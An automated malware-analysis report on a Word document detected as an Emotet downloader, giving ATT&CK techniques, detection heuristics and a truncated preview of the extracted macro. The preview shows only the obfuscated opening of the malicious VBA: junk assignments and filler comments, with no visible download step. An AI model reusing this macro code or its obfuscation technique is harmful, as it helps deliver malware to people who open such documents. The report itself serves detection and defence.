Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample triggers a critical heuristic for an obfuscated auto-exec VBA loader: an AutoOpen macro that uses CreateObject together with execution tokens. ClamAV also identifies it as Doc.Downloader.Emotet-7331190-0. The VBA script is heavily obfuscated with what appear to be junk comments and meaningless variable assignments, but it is structured to execute code via CreateObject, indicating that it likely downloads and executes a second-stage payload.
Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-7331190-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7331190-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 74010 bytes |

SHA-256: 67758a9a0d209cd1852c94f42fa22685549b6ef3f313d0b31fe02797ab1e27cd

Preview (first 1,000 lines of the extracted script, truncated below):
Attribute VB_Name = "b389210350493"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "x6b460306c1, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b5c070100x025, 1, 1, MSForms, TextBox"
Attribute VB_Control = "xc117391c90x, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x568076028c10, 3, 3, MSForms, TextBox"
Attribute VB_Control = "x0675c0609058, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c61091060x28, 5, 5, MSForms, TextBox"
Attribute VB_Name = "c0cb220c200x9"
Function c839959690884()
On Error Resume Next
x86b06408c917 = False
'Dynamic0571 Berenice Street, Shanafort, Jersey Dynamic1487 Hauck Port, Caesarville, Ukraine
xc54080b140 = Round(b054721b9381)
x6ccc009xc0 = False
'International2876 Johathan Meadows, Lake Morgan, Solomon Islands Internal125 Rodolfo Circles, Murphyfurt, Swaziland
x638cbx7893 = Round(b13001b607x)
b570344cx6386 = True
'Future182 Willms Points, Jodybury, French Polynesia Dynamic93598 Doyle Mission, West Brandimouth, Jamaica
b40060694c30 = Round(x02446708401)
c0c2c5x6018 = True
'Chief40941 Nikolaus Wells, Veldafurt, Gabon National7427 Hessel Club, Mattieview, Slovakia (Slovak Republic)
c10x83797x1 = Round(x6940381x4xx)
b0cb96600041 = False
'Customer5156 Hilda Glen, West Audieside, Saint Barthelemy National2724 Osinski Mountains, East Johnson, Belize
bb0017560323 = Round(c00xx0x05066x)
cx96b706b0xcx = True
'Direct86253 Gerlach Inlet, Bruceview, Tajikistan Dynamic418 Purdy Turnpike, Goldnerborough, Tanzania
c439b0b4cb688 = Round(c6290370b102)
x70081bc3b0 = False
'Future45938 Angelita Course, Travonfurt, Belarus Internal643 Ricardo Turnpike, Lake Clementina, Pakistan
b570378x602x = Round(b26283cc569)
x6c10c8x35259 = True
'Chief43426 Bartoletti Viaduct, Port Emilemouth, Montserrat Corporate288 Faustino Highway, Port Lucy, Liechtenstein
b980cx5000c = False
'International41850 Rogahn Plaza, Lake Glennieberg, El Salvador National0093 Skiles Extension, Cobybury, Botswana
b0x130454830 = Round(x0100309000)
c93509c834bc0 = False
'Global412 Reichert Lodge, Ethylview, Georgia Legacy55647 Weber Burgs, Justusmouth, Croatia
xx3b30cb70cb6 = Round(x55c60x16c8)
bc8c928968509 = True
'Principal90496 Phoebe Row, Smithberg, Micronesia Human9761 Hahn Garden, Millerhaven, Mali
b877xc1889b0x = Round(c95c842x32x58)
b0c2906x40c60 = False
'Principal86165 DuBuque Drive, Purdymouth, Montenegro Future226 Aron Mission, Port Adelle, Oman
b80090360327 = Round(x97093199b03)
b602790460x = False
'National484 Bernita Mission, New Antoinettemouth, Cuba Regional14903 Marquardt Keys, Barrowsmouth, Sweden
x1052284b68 = Round(b90004b2c44)
b6710053050 = True
'Global06461 Carmella Harbors, Lake Otisland, Botswana Dynamic83659 Kozey Isle, Port Ramonburgh, Latvia
xx82x1052c58 = Round(x9c06520c000)
c62c243b8031x = True
'International593 Hilll Valley, Lake Tessbury, Gabon District783 Buckridge Lodge, West Sophiamouth, Nigeria
bc60c47971b = Round(c0324c90033)
xb263406083 = False
'Regional378 Hansen River, Lake Einar, Saint Barthelemy Regional30339 White Ways, Roymouth, South Georgia and the South Sandwich Islands
b0008097499x7 = True
'Investor5341 Gardner Views, Mariannaside, Peru Forward30649 Raynor Hills, New Aliastad, Papua New Guinea
c4289x51624 = Round(c82b74100274)
c125077000000 = True
'Chief029 Carter Camp, Stokesville, Spain National97814 Genevieve Neck, South Christ, Tajikistan
x61618058516 = Round(x91x36x204000)
x772179305xc = False
'Customer2173 Mohammed Spurs, Nathanbury, Uganda Human1581 Deangelo Forge, New Stephanie, Barbados
x0bcc0c80546 = Round(c019cx5071114)
b23280890002 = False
'National77434 Stokes Crest, North Davestad, Venezuela Forward9329 Wisoky Fields, Windlerberg, Chile
x08707b13x0cc = Round(c05023cx230bx)
b90c536840230 = True
'Lead398 Orlando Expressway, East Bill, Lao People's Democratic Republic Direct936
... (truncated)